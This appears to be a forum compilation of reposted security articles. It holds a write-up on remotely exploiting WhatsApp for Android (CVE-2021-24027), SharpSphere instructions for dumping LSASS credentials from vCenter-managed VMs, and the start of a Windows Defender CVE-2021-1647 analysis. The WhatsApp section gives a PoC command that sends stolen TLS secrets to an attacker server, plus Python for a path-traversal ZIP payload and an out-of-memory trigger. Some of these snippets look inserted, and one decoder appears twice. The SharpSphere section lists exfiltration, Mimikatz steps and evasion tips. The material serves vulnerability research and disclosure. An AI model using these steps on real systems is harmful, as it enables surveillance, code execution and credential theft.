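
```python
import base64

def parse_watls_filename(name: str) -> tuple:
    """Decode a watls-sessions cache filename into (host, port, cipher)."""
    decoded = base64.urlsafe_b64decode(name).decode()
    host, port, cipher = decoded.split("#")
    return host, int(port), cipher

host, port, cipher = parse_watls_filename(
    "bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2"
)
# prints: media.fath4-2.fna.whatsapp.net 443 TLS_AES_128_GCM_SHA256
print(host, port, cipher)
```

In other words, an attacker who obtains a directory listing already learns which endpoints and cipher suites the victim has cached sessions for.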
The TLS 1.2 mechanism is used for profile picture and sticker pack downloads, sonar pingback (related to location sharing), WhatsApp payments, and also for the account registration and verification procedures. Last but not least, devices running WhatsApp that come with no Google Play Store services (com.android.vending) pre-installed communicate with https://www.whatsapp.com over TLS 1.2 to determine the latest version of the APK and, if needed, download the app and install it.

In TLS 1.2, file-based storage of TLS sessions is achieved via SSLSessionCache [28], whose constructor takes a File instance pointing to the directory where sessions will be stored. An SSLSocketFactory descendant is used to actually create SSL sockets utilizing the external SSL session cache. The entry point to this logic is ExternalSSLCacheEnabledSSLSocketFactoryInterface (X.1Sb), shown below.

public abstract class ExternalSSLCacheEnabledSSLSocketFactoryInterface extends SSLSocketFactory {
    ...
    public final SSLSessionCache externalSSLSessionCache;
    ...
    static {
        File externalCacheDir = context.getExternalCacheDir();
        SSLSessionCache sslSessionCache = new SSLSessionCache(new File(externalCacheDir, "SSLSessionCache"));
        this.externalSSLSessionCache = sslSessionCache;
    }
}

Again, we see that context.getExternalCacheDir() is consulted to identify the path where cached TLS session items will be stored. An adversary that has somehow gained access to the external cache directory (e.g. through a rogue or vulnerable application) can steal TLS 1.3 PSK keys and TLS 1.2 master secrets. As already discussed, this could lead to successful man-in-the-middle attacks. For the purposes of this article we will use the previously described SOP bypass vulnerability in Chrome to remotely access the TLS session secrets. All an attacker has to do is lure the victim into opening an HTML document attachment.
WhatsApp will render this attachment in Chrome, over a content provider, and the attacker's Javascript code will be able to steal the stored TLS session keys. Convincing a user to actually open an HTML document is an art by itself. However, as will become clear later, the protobuf-based WhatsApp messaging protocol could aid the attacker in this respect.

From TLS secrets collection to Remote Code Execution

This section explores two attacks against WhatsApp, one leading to code execution and one leading to leakage of Noise protocol keys, used in the end-to-end encryption of user communications. The former requires the TLS 1.2 man-in-the-middle capability, while the latter requires a combination of TLS 1.2 and TLS 1.3 man-in-the-middle capabilities. As the TLS 1.3 man-in-the-disk vulnerability had been patched by the time we were creating the demo for the issue, we emulated the TLS 1.3 man-in-the-middle capability through Frida in the second attack (forcing connections over TLS 1.2). If you have access to a version of the app where both TLS man-in-the-disk vulnerabilities exist, then it is possible to carry out the second attack without emulation, by setting up two OpenSSL instances: one for the TLS 1.2 MitM and one for the TLS 1.3 (WaTLS) MitM.

Both attacks start with an information gathering phase where the remote attacker collects the TLS session secrets. In the video above, on the left, running the dark theme, we can see the attacker device, and on the right, running the light theme, the victim device. The attacker begins information gathering by executing main.py of the proof-of-concept toolset, which makes use of Python and Frida to control the attacking device. This is what the command looks like:

python main.py -s ANDROID_SERIAL -a 192.168.1.100 -p 8000 images/the_guardian.jpg \
    MOBILE_NUMBER@s.whatsapp.net "Rush for Mediterranean gas" -r

Argument -s ANDROID_SERIAL instructs ADB to connect to the attacker's device with the specified device serial number.
Arguments -a and -p determine the IP address and port of the web server where the SOP exploit will POST the extracted secrets using AJAX, while -r instructs our PoC to run a simple HTTP server on the local PC. Alternatively, one could have specified the IP of a remote web server the attacker controls. The three positional arguments are (1) the path to an image to show as a fake message preview at the victim's side, (2) the victim's mobile number and (3) a string to show as a caption below the fake preview.

The PoC uses Frida hooks on a WhatsApp method responsible for sending document messages. It attaches the fake message preview and caption to the outgoing protocol buffer to make the result more attractive for the victim to click on. In this demonstration, the remote attacker sends the victim what looks like a link to an interesting newspaper article. Upon clicking on the message, the victim is presented with the standard Android application picker. The message's MIME type, as sent in the WhatsApp protocol buffer headers, is set to 'text/html', so Chrome is usually the only entry in the aforementioned picker.

When the victim clicks on the message, the SOP exploit executes. For debugging purposes we have designed an HTML page that displays progress information during exploitation, but a real-life scenario might have an actual newspaper article displayed on the victim's screen. The exploit, in just a few seconds, brute-forces the first 1000 IDs in the Media Store and locates files that look like serialized TLS sessions. Using AJAX, these files are sent back to a server of the attacker's choosing. In this demonstration, the web server has been started on the attacker's PC and the received TLS secrets are stored under /tmp in files with the .bin extension. With the TLS material now in the attacker's possession, the victim is exposed to man-in-the-middle attacks.
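Since each cached WaTLS session file is named after base64-encoded endpoint metadata (hostname#port#cipher suite, as shown earlier), an attacker triaging the stolen files can tell which endpoint each session belongs to from the filename alone. A minimal sketch of such a decoder (the helper name is ours; Android's Base64 flag 10 means URL-safe with no padding or line wrapping, so padding must be restored before decoding):

```python
import base64

def decode_watls_filename(name: str):
    """Recover (host, port, cipher) from a WaTLS session cache filename."""
    # Android's Base64.encodeToString(data, 10) emits URL-safe base64
    # without '=' padding; re-add padding before decoding.
    padded = name + "=" * (-len(name) % 4)
    host, port, cipher = base64.urlsafe_b64decode(padded).decode().split("#")
    return host, int(port), cipher

print(decode_watls_filename(
    "bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2"
))
# ('media.fath4-2.fna.whatsapp.net', 443, 'TLS_AES_128_GCM_SHA256')
```

Running this over a directory of stolen session files immediately shows which sessions belong to media endpoints versus other WhatsApp infrastructure.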
To gain a man-in-the-middle position in the network, the attacker may use several methods (e.g. ARP spoofing, DNS spoofing, router/BGP hijacking, tapping of communication links, etc.) depending on the resources available. Nation-state actors have demonstrated increased capabilities in this area of attacks in the past. There might be several opportunities for code execution once a MitM channel has been established, but for demonstration purposes, this section focuses on a simple file overwrite capability made available through TLS-transported ZIP files.

The WhatsApp client uses photo filters and doodle emojis, which are downloaded from the upstream network. Both of these resources are referred to as downloadables in the WhatsApp Java code. Use of downloadables depends on WhatsApp network configuration parameters. Where the author lives, filters seem to be enabled, while emojis are disabled, so this attack will focus on the former. Additionally, photo filters are downloaded the first time a user attempts to use them, and are not downloaded again for the rest of the WhatsApp installation's lifetime, while doodle emojis are refreshed every now and then. Consequently, the attacker has a single chance of exploiting filters, while more opportunities are available for performing MitM on the emoji downloader. Interested readers can check the related network settings on their devices:

# pwd
/data/data/com.whatsapp/shared_prefs
# grep -r downloadable_doodle .

If no result is shown, downloadable doodle emojis are disabled on your device. When the user attempts to use photo filters, WhatsApp performs an HTTP request in the background to the following URL:

https://static.whatsapp.net/downloadable?category=filter

A ZIP bundle is downloaded from the above location and extracted using the following piece of code, which can be found in class FilterManager (X.2FB). Similar code can be found in the DoodleEmojiManager class (X.1zX) for emojis.
public boolean unsafeExtractManifestEntryZip(HttpResponseInterface response, String str) {
    FileOutputStream fileOutputStream;
    ...
    // (1)
    ZipInputStream zipInputStream = new ZipInputStream(
        new MessageInputStream(response.getInputStream(), this.A06, 0)
    );
    ...
    byte[] bArr = new byte[8192];
    while(true) {
        // (2)
        ZipEntry nextEntry = zipInputStream.getNextEntry();
        ...
        // (3)
        fileOutputStream = new FileOutputStream(
            new File(idHashFileName.getAbsolutePath(), nextEntry.getName())
        );
        while(true) {
            int read = zipInputStream.read(bArr);
            if(read == -1)
                break;
            fileOutputStream.write(bArr, 0, read);
        }
        fileOutputStream.close();
    }
    zipInputStream.close();
    ...
}

Focusing only on the relevant parts, at (1) a ZipInputStream is instantiated. The input to the ZipInputStream comes from another type of input stream which, in turn, reads its input from the HTTP channel established to the aforementioned URL. As the ZIP bundle is downloaded, input flows to the ZipInputStream and ZIP entries are parsed one by one at (2). The most interesting stuff happens at (3), where a FileOutputStream is created to a destination file whose name is constructed by concatenating the return value of getAbsolutePath() of a directory with the string returned from the ZIP entry's getName(). As is well known, the name of an entry in a ZIP directory should not be trusted, as it might contain directory traversal sequences. It is exactly this "feature" that an attacker can exploit to overwrite arbitrary files owned by WhatsApp.

The next question is what file an attacker can overwrite in order to eventually execute code with the privileges of the WhatsApp client. Unfortunately, WhatsApp for no apparent reason makes use of Facebook's superpack for distributing its native libraries. What happens is that all native DSOs are placed in a compressed archive, in a proprietary format, and then packed in the application's APK as a raw asset.
When the application is executed, native libraries are extracted under data/ and SoLoader [31] is used to load them. Attackers are thus able to modify the extracted libraries and have the victim application load untrusted code. Here's where the extracted libraries can be found:

# pwd
/data/data/com.whatsapp/files/decompressed/libs.spk.zst
# ls -la
total 9042
drwx------ 2 u0_a168 u0_a168    3488 2021-02-10 17:30 .
drwx------ 3 u0_a168 u0_a168    3488 2021-01-25 17:11 ..
-rw------- 1 u0_a168 u0_a168      32 2021-02-10 17:30 .superpack_version
-rw------- 1 u0_a168 u0_a168 1055016 2021-02-10 17:30 libc++_shared.so
-rw------- 1 u0_a168 u0_a168  123744 2021-02-10 17:30 libcurve25519.so
-rw------- 1 u0_a168 u0_a168  134056 2021-02-10 17:30 libfbjni.so
-rw------- 1 u0_a168 u0_a168   47656 2021-02-10 17:30 libgifimage.so
-rw------- 1 u0_a168 u0_a168   76296 2021-02-10 17:30 libminscompiler-jni.so
-rw------- 1 u0_a168 u0_a168  200000 2021-02-10 17:30 libprofilo.so
-rw------- 1 u0_a168 u0_a168   68368 2021-02-10 17:30 libprofilo_atrace.so
-rw------- 1 u0_a168 u0_a168   23096 2021-02-10 17:30 libprofilo_build.so
-rw------- 1 u0_a168 u0_a168   67688 2021-02-10 17:30 libprofilo_fb.so
-rw------- 1 u0_a168 u0_a168    3720 2021-02-10 17:30 libprofilo_fmt.so
-rw------- 1 u0_a168 u0_a168   23976 2021-02-10 17:30 libprofilo_linker.so
-rw------- 1 u0_a168 u0_a168   68296 2021-02-10 17:30 libprofilo_mmapbuf.so
-rw------- 1 u0_a168 u0_a168   48688 2021-02-10 17:30 libprofilo_plthooks.so
-rw------- 1 u0_a168 u0_a168    9144 2021-02-10 17:30 libprofilo_sigmux.so
-rw------- 1 u0_a168 u0_a168  134328 2021-02-10 17:30 libprofilo_stacktrace.so
-rw------- 1 u0_a168 u0_a168   68432 2021-02-10 17:30 libprofilo_systemcounters.so
-rw------- 1 u0_a168 u0_a168   68080 2021-02-10 17:30 libprofilo_threadmetadata.so
-rw------- 1 u0_a168 u0_a168   83928 2021-02-10 17:30 libprofilo_util.so
-rw------- 1 u0_a168 u0_a168    3240 2021-02-10 17:30 libprofiloextapi.so
-rw------- 1 u0_a168 u0_a168  395992 2021-02-10 17:30 libstatic-webp.so
-rw------- 1 u0_a168 u0_a168    5880 2021-02-10 17:30 libvlc.so
-rw------- 1 u0_a168 u0_a168 6378408 2021-02-10 17:30 libwhatsapp.so
-rw------- 1 u0_a168 u0_a168  119408 2021-02-10 17:30 libyoga.so

The following video demonstrates the attack. A malicious libwhatsapp.so library is extracted over the legitimate one. WhatsApp exits and immediately attempts to restart. The malicious library is loaded and "pwnd!" is recorded to the system logs. Please note the following:

The relevant material can be found in the PoC's tls12_psk_extract/ directory. Detailed instructions for setting up the MitM environment can be found in README.md in the same directory. To make testing and demonstration easier, instead of carrying out the information gathering phase again and again, we make use of ADB to pull the TLS session files directly from the victim device. These files correspond to the leaked .bin files shown in the previous video.

The video shows the attacker preparing payload.zip, a ZIP file that holds the malicious libwhatsapp.so library. The name of the ZIP entry is modified to contain directory traversal sequences and the final archive is copied into tls12_psk_extract/ to be used by our MitM server scripts. Leaked TLS 1.2 sessions are actually DER-encoded structures. Recall that Android uses BoringSSL, while most Linux and Mac OS X PCs use OpenSSL instead. To make the leaked session recognizable by OpenSSL, one has to convert between the two DER formats. Script convert_session.sh, which uses boringssl_session.cpp and openssl_session.c in the background, is used for this task. The resulting OpenSSL session file is stored in the current directory under session.der (DER format) and session.pem (PEM format). Session information is also displayed on the screen. The last command in the long listing is a wrapper shell script, namely run_server.sh, that executes an OpenSSL version specially modified to perform MitM attacks on WhatsApp's TLS 1.2.
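Building a payload.zip with a traversal entry name takes only a few lines, since the ZIP format imposes no restrictions on entry names and Python's zipfile writes them verbatim. A minimal sketch (the traversal depth and target path here are illustrative; a real payload must be tuned to WhatsApp's actual extraction directory):

```python
import zipfile

# Entry name escapes the extraction directory; an unsafe extractor that
# concatenates "dir + entry name" will write outside the target directory.
TRAVERSAL_NAME = "../../files/decompressed/libs.spk.zst/libwhatsapp.so"

def build_payload(zip_path: str, library_bytes: bytes) -> None:
    with zipfile.ZipFile(zip_path, "w") as zf:
        zf.writestr(TRAVERSAL_NAME, library_bytes)

build_payload("payload.zip", b"\x7fELF")  # placeholder library contents
with zipfile.ZipFile("payload.zip") as zf:
    print(zf.namelist())
# ['../../files/decompressed/libs.spk.zst/libwhatsapp.so']
```

When such an archive is fed to unsafeExtractManifestEntryZip(), the FileOutputStream at (3) resolves the traversal sequences and the attacker's library lands on top of the legitimate one.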
The patch for OpenSSL 1.1.1f can be found in openssl-1.1.1f-patches/tls12-mitm.patch. In the video one can see the victim attempting to send a picture to the attacker. WhatsApp attempts to download the photo filters from the URL mentioned above but, instead, the modified s_server serves the malicious ZIP payload.

Stealing the victim's Noise protocol key pair

In this section we will see how the attained man-in-the-middle capability could also lead to the compromise of the confidentiality of user communications. The WhatsApp Security Whitepaper [23] explains that user communications are protected through end-to-end (E2E) encryption. The protocol used for E2E encryption is the Noise protocol [05].

WhatsApp comes with a debugging mechanism that allows its development team to catch fatal errors happening in the wild during the first few days of a release. More specifically, if an OutOfMemoryError exception is thrown, a custom exception handler is invoked that collects system information, WhatsApp application logs, as well as a dump of the application heap (collected using android.os.Debug::dumpHprofData()). These are uploaded to crashlogs.whatsapp.net. This process is carried out if and only if fewer than 10 days have elapsed since the current version's release date. Needless to say, the heap content that is uploaded to the WhatsApp infrastructure holds sensitive user information. Using the strings tool against the dumped heap data, one can easily identify plaintext conversations and, more interestingly, Noise protocol key pairs, encoded in base64 form. The relevant code can be found in class OOMHandler (X.0nS):

public void uncaughtException(Thread thread, Throwable throwable) {
    ...
    // (1)
    if(C008703v.getNumberOfDaysSinceReleaseDate(r12.expirationChecker) > 10) {
        z5 = true;
    }
    if(z5) {
        Log.m19i("OOMHandler/hprof dump not allowed");
    } else {
        ...
        // (2)
        Debug.dumpHprofData(String.format(Locale.US, "%s/dump.hprof", new Object[] {
            r12.hprofFilenameMatcher.context.getCacheDir().getPath()
        }));
        Log.m19i("OOMHandler/dump successful");
    }
    ...
}

At (1), getNumberOfDaysSinceReleaseDate() is called, which performs the action its name indicates. If the return value is larger than 10, the heap contents are not dumped. However, in case fewer than 10 days have elapsed since the release date, the heap content is written to dump.hprof and placed in the application's private cache directory.

From an attacker's perspective, the above process is quite interesting, as all connections to the crash logs server, even though they are protected through TLS, can be intercepted after extracting the corresponding master secret from the victim's device. Interestingly, WhatsApp uses both TLS 1.2 and TLS 1.3 (WaTLS) during the information upload process; logs are uploaded using TLS 1.2, while heap contents use TLS 1.3 (WaTLS). With the corresponding master secret / PSK extracted from a victim's device, both connections can be intercepted and their contents can be read in plaintext.

With this in mind, one might wonder how an OutOfMemoryError exception can be triggered remotely on the victim's device. While the author was preparing his debugging environment, he noticed that WhatsApp performs the following HTTP request quite often:

https://static.whatsapp.net/sticker?cat=all&lg=en-US&country=GR&ver=2

Even though the exact mechanics leading to this action are not known to the author, a quick visit to the above location shows that this URL hosts a JSON file holding information on WhatsApp sticker packs. It turns out that a method we have named openStickerConnection() (defined in class X.2kz) is responsible for connecting to this URL and downloading the response. Here's what it looks like:

public final ETagAndStickerPacksBundle openStickerConnection(String url, String etag) {
    HttpsURLConnection httpsURLConnection;
    ...
    // (1)
    httpsURLConnection = new URL(url).openConnection();
    httpsURLConnection.setSSLSocketFactory(this.A06.getMediaExternalSSLCacheEnabledSSLSocketFactory());
    httpsURLConnection.setRequestProperty("User-Agent", this.A07.getUserAgent());
    httpsURLConnection.setConnectTimeout(15000);
    httpsURLConnection.setReadTimeout(30000);
    httpsURLConnection.setRequestMethod("GET");
    ...
    int responseCode = httpsURLConnection.getResponseCode();
    if(responseCode == 200) {
        ...
        InputStream inputStream = httpsURLConnection.getInputStream();
        // (2)
        String json = C27551It.readAllFromInputStream(inputStream);
        AssertUtil.assertNotNull(json);
        JSONArray jSONArray = new JSONArray(json);
        ...
    }
    ...
}

At (1) WhatsApp initiates an HTTP connection to the given URL. One thing to note here is that the connection's SSLSocketFactory is set to the return value of getMediaExternalSSLCacheEnabledSSLSocketFactory(). The latter returns an instance of the TLS 1.2 SSL factory that stores TLS sessions in the device's external storage and, thus, it is possible for an attacker to intercept this connection. Later on, at (2), one can see that once an input stream has been opened, WhatsApp uses readAllFromInputStream() of class X.1It to read the whole response into a single string buffer, no matter how large the latter is. For completeness, the code of readAllFromInputStream() is shown below:

public static String readAllFromInputStream(InputStream inputStream) {
    char[] buf = new char[8192];
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    StringWriter stringWriter = new StringWriter();
    while(true) {
        int read = bufferedReader.read(buf);
        if(read < 0) {
            bufferedReader.close();
            return stringWriter.toString();
        } else if(!Thread.currentThread().isInterrupted()) {
            stringWriter.write(buf, 0, read);
        } else {
            throw new InterruptedIOException();
        }
    }
}

Sending an arbitrarily large response to the client will eventually trigger an Out-Of-Memory (OOM) condition.
Furthermore, to avoid sending large amounts of data and to trigger the OOM faster, an attacker can use GZip encoding. Once an OutOfMemoryError is thrown, WhatsApp's custom exception handler will be called to handle the situation. System information will be collected, and the upload process will be triggered. Intercepting the connection will disclose all the sensitive information that was intended to be sent to WhatsApp's internal infrastructure. The following image shows what a successful attack looks like:

The screenshot above shows a tmux session. The window on the left shows the output of openssl_http_pipe.py (found under tls12_psk_extract/), a tool that forks a modified OpenSSL s_server instance and communicates with it over a pipe, in order to allow a user to handle HTTP requests manually. The lines at the very bottom show the POST request that WhatsApp issues in order to upload the heap data. In our case, around 4 MB of data have been grabbed. The window on the right shows a brief overview of this data. It can be seen that it is actually part of a multipart request, corresponding to a file named dump.gz. The latter's contents are not shown here in full, as they contain cryptographic material of an actual WhatsApp account.

The tooling required for this attack can be found in the PoC's tls12_psk_extract/ directory. Detailed instructions for setting up the MitM environment can be found in README.md in the same directory.
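The GZip trick mentioned above works because DEFLATE compresses repetitive data extremely well, so the bytes actually sent over the wire can be a tiny fraction of what the client inflates in memory. A quick illustration of the amplification (the sizes here are indicative, not measurements from the actual attack):

```python
import gzip

# A highly repetitive body compresses extremely well, so a MitM server
# can make the client allocate far more memory than is sent on the wire.
plaintext = b"A" * (16 * 1024 * 1024)   # 16 MiB once inflated by the client
compressed = gzip.compress(plaintext)   # only a handful of KiB on the wire

ratio = len(plaintext) // len(compressed)
print(len(compressed), ratio)  # amplification ratio is typically in the hundreds or more
```

Chaining a few such bodies is enough to exhaust the heap of readAllFromInputStream()'s StringWriter on a typical device.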
Of course, the collection of secrets could have also been achieved through the introduction of a malicious application on the victim's device. Once the TLS session secrets were collected, it was possible to perform a man-in-the-middle attack on WhatsApp communications. The man-in-the-middle attack allowed the attacker to execute arbitrary code on the victim's device. Moreover, it allowed for the collection of the victim user's Noise protocol cryptographic material, which could later be used for the decryption of user communications.

The introduction of Scoped Storage in Android greatly limits the impact of man-in-the-disk vulnerabilities. Android 11 is the first version of Android to fully enforce scoped storage, allowing apps to access by default only their own resources on external storage. CENSUS strongly recommends that users make sure they are using WhatsApp version 2.21.4.18 or greater on the Android platform, as previous versions are vulnerable to the aforementioned bugs and may allow for remote user surveillance. CENSUS has tracked the TLS 1.2 man-in-the-disk vulnerability under CVE-2021-24027 [33].

There are many more subsystems in WhatsApp which might be of great interest to an attacker. The communication with upstream servers and the E2E encryption implementation are two notable ones. Additionally, despite the fact that this work focused on WhatsApp, other popular Android messaging applications (e.g. Viber, Facebook Messenger), or even mobile games, might be unwillingly exposing a similar attack surface to remote adversaries.
References

[01] https://blog.checkpoint.com/2018/08/12/man-in-the-disk-a-new-attack-surface-for-android-apps/
[02] https://bugs.chromium.org/p/chromium/issues/detail?id=1092449
[03] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516
[04] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24027
[05] http://www.noiseprotocol.org/
[06] https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/
[07] https://www.washingtonpost.com/technology/2019/10/29/whatsapp-accuses-israeli-firm-helping-governments-hack-phones-journalists-human-rights-workers/
[08] https://github.com/skylot/jadx
[09] https://developer.android.com/guide/topics/providers/content-providers
[10] https://developer.android.com/guide/topics/manifest/provider-element
[11] https://android.googlesource.com/platform/frameworks/base/+/962fb40991f15be4f688d960aa00073683ebdd20%5E%21/#F0
[12] https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
[13] https://developer.android.com/about/versions/10/privacy/changes#scoped-storage
[14] https://chromium.googlesource.com/chromium/src/+/c6e232163d52e4334f7227ef30634b707e44a903%5E%21/#F4
[15] https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API
[16] http://phrack.org/issues/69/13.html
[17] https://tools.ietf.org/html/rfc8446
[18] https://developer.android.com/reference/javax/net/ssl/X509TrustManager
[19] https://tools.ietf.org/html/rfc5077
[20] https://www.openssl.org/docs/man1.1.1/man3/SSL_set_psk_find_session_callback.html
[21] https://tools.ietf.org/html/rfc5246
[22] https://tools.ietf.org/html/rfc7627
[23] https://www.whatsapp.com/security/WhatsApp-Security-Whitepaper.pdf
[24] https://threatpost.com/researchers-find-ssl-problems-in-whatsapp/104411/
[25] http://aosp.opersys.com/xref/android-10.0.0_r47/xref/external/conscrypt/repackaged/common/src/main/java/com/android/org/conscrypt/FileClientSessionCache.java#44
[26] https://docs.oracle.com/javase/7/docs/api/javax/net/ssl/SSLSocket.html#startHandshake()
[27] https://docs.oracle.com/javase/7/docs/api/javax/net/ssl/SSLSessionContext.html#getSession(byte[])
[28] https://developer.android.com/reference/android/net/SSLSessionCache
[29] https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/
[30] https://blog.talosintelligence.com/2019/04/seaturtle.html
[31] https://github.com/facebook/SoLoader
[32] https://twitter.com/Shiftreduce/status/1347546599384346624/photo/1
[33] WhatsApp Exposure of TLS 1.2 Cryptographic Material to Third Party Apps (CVE-2021-24027)
[34] WhatsApp for Android
[35] https://www.appbrain.com/stats/top-android-sdk-versions
[36] READ_EXTERNAL_STORAGE permission in Android apps
[37] https://github.com/CENSUS/whatsapp-mitd-mitm

Sursa: https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/
4. Dumping LSASS with SharpSphere

The dump function of SharpSphere allows operators to dump LSASS from any powered-on VM managed by vCenter or ESXi, without needing to authenticate to the guest OS and without needing VMware Tools to be installed. This technique is not new and has been around for many years:

https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-6-vmware-workstation/
https://web.archive.org/web/20210204072538/https://www.remkoweijnen.nl/blog/2013/11/25/dumping-passwords-in-a-vmware-vmem-file/

Although until now it's been very difficult to leverage operationally. At its core, the process is:

Authenticate to vCenter/ESXi
Create a snapshot, with memory, of a powered-on target VM
Download the (often very large) .vmem and .vmsn files from the datastore
Either run it through Volatility
Or convert to .dmp with vmss2core and run it through WinDbg with Mimikatz

Arguments

Z:\>SharpSphere.exe dump --help
SharpSphere 1.0.0.0
Copyright © 2020

  --url          Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk
  --username     Required. vCenter username, i.e. administrator@vsphere.local
  --password     Required. vCenter password
  --targetvm     Required. VM to snapshot
  --snapshot     (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from last existing snapshot, or none if no snapshots are available.
  --destination  Required. Full path to the local directory where the file should be downloaded
  --help         Display this help screen.
  --version      Display version information.

--snapshot

By default, SharpSphere will not attempt to create a snapshot and will instead attempt to find valid .vmem and .vmsn files from an existing snapshot. This is preferable from an OpSec perspective because there will be no evidence in the UI, however it's obviously not guaranteed that a particular target VM has any snapshots, or whether these snapshots also captured the VM's memory. If no existing snapshot exists then SharpSphere will exit.
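That default behaviour — use the most recent existing snapshot that captured memory, otherwise give up — boils down to a walk over the VM's snapshot tree. A rough sketch of the selection logic (the data model here is illustrative, not SharpSphere's actual code):

```python
from dataclasses import dataclass, field

@dataclass
class Snapshot:
    name: str
    created: int            # creation timestamp (illustrative)
    has_memory: bool        # True if the snapshot captured RAM (a .vmem exists)
    children: list = field(default_factory=list)

def latest_memory_snapshot(roots):
    """Return the most recently created snapshot that includes memory, or None."""
    best = None
    stack = list(roots)
    while stack:                         # depth-first walk of the snapshot tree
        snap = stack.pop()
        if snap.has_memory and (best is None or snap.created > best.created):
            best = snap
        stack.extend(snap.children)
    return best

tree = [Snapshot("base", 1, False, [Snapshot("pre-update", 2, True),
                                    Snapshot("nightly", 3, True)])]
print(latest_memory_snapshot(tree).name)  # nightly
```

If this search comes back empty, the only option left is to create a fresh memory snapshot, which is exactly what the --snapshot flag does.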
With --snapshot specified, SharpSphere will create a snapshot called System Backup [TIMESTAMP], download its associated .vmem and .vmsn files, and then delete the snapshot once finished. Both the creation and deletion of the snapshot will be seen by other users in the Recent Tasks window. It's possible to attempt it without --snapshot first to see if existing snapshots exist, and then repeat with --snapshot specified if none do.

--destination

SharpSphere needs to download two files from the snapshot: a large .vmem file that is equal in size to the amount of RAM assigned to the machine (i.e. 4GB, 8GB, 16GB etc.), and a much smaller .vmsn file. It downloads these files to the directory specified by --destination on the executing machine. When running through Cobalt Strike's execute-assembly this is obviously a directory on the beacon machine's filesystem. This is an important distinction to make because it's likely your target user is on an internal network and therefore the download should be relatively quick, as opposed to having to download these files over your beacon's proxy. Once the two files are downloaded, SharpSphere adds both to a zip file with a random name and then deletes them. This makes the resultant file marginally easier to exfiltrate; for example, during testing a 4GB .vmem file resulted in an 800MB zip.

Instructions

Execute SharpSphere with the following arguments (Hint: get the VM name with list):

SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES]

Example Output

C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public"
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface, takes a few minutes...
[x] Connected to VMware vCenter Server 7.0.1 build-17005016
[x] Successfully authenticated
[x] Finding existing snapshots for Windows 10...
Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set

If no snapshots exist, repeat the same command and include --snapshot:

SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface, takes a few minutes...
[x] Connected to VMware vCenter Server 7.0.1 build-17005016
[x] Successfully authenticated
[x] Creating snapshot for VM Windows 10...
[x] Snapshot created successfully
[x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz...
[x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv...
[x] Download complete, zipping up so it's easier to exfiltrate...
[x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz
[x] Deleting the snapshot we created

If your C2 infrastructure and bandwidth support it, download the resultant zip to your attacker-controlled machine. Alternatively, and less OpSec-safe, upload the necessary tools to the beacon machine, with the understanding that these tools may be flagged as suspicious. The rest of the instructions assume you've managed to get the file back to your machine.

Rename the random file, in this instance cec0kwgk.b2m, to be a zip file and then extract the two files. The larger one is your .vmem file. Download vmss2core and provide it first with the smaller .vmsn file and then the larger .vmem file.
If the target VM is Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019 then execute with -W8:

vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz

Otherwise use -W:

vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz

Download WinDbg and load the resultant .dmp file that vmss2core generated as a Crash Dump. Download Mimikatz and load mimilib.dll from within WinDbg:

.load C:\Tools\Mimikatz\x64\mimilib.dll

Find the LSASS process:

!process 0 0 lsass.exe

Switch to that process:

.process /r /p ffffc70462d020c0

Profit:

!mimikatz

Written on February 26, 2021

Sursa: https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/
  5. CVE-2021-1647: Windows Defender mpengine remote code execution

Maddie Stone

The Basics

Disclosure or Patch Date: 12 January 2021
Product: Microsoft Windows Defender
Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647
Affected Versions: Version 1.1.17600.5 and previous
First Patched Version: Version 1.1.17700.4
Issue/Bug Report: N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Reporter(s): Anonymous

The Code

Proof-of-concept:
Exploit sample: 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788
Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Heap buffer overflow

